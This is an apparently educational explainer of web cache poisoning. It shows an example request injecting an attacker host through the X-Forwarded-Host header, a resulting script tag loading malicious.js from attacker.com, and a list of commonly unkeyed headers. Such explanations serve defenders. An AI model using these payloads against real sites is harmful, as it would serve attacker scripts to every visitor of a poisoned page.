Web Cache Poisoning is an attack where an attacker manipulates cache behavior to store malicious responses that are then served to other users. This is achieved by injecting content through unkeyed inputs that affect the response but aren't part of the cache key.
Caches identify responses using a cache key (typically URL + some headers). If the application reflects unkeyed inputs (headers not in the cache key) in the response, attackers can poison the cache with malicious content that gets served to all users requesting the same resource.
1. Attacker identifies unkeyed input that affects response
GET /page HTTP/1.1
X-Forwarded-Host: attacker.com
2. Server generates response using attacker's input
<script src="https://attacker.com/malicious.js"></script>
3. Cache stores poisoned response (X-Forwarded-Host not in cache key)
4. Victim requests same page
GET /page HTTP/1.1
5. Cache serves poisoned response containing attacker's payloadX-Forwarded-HostX-Forwarded-ProtoX-Original-URLX-Rewrite-URL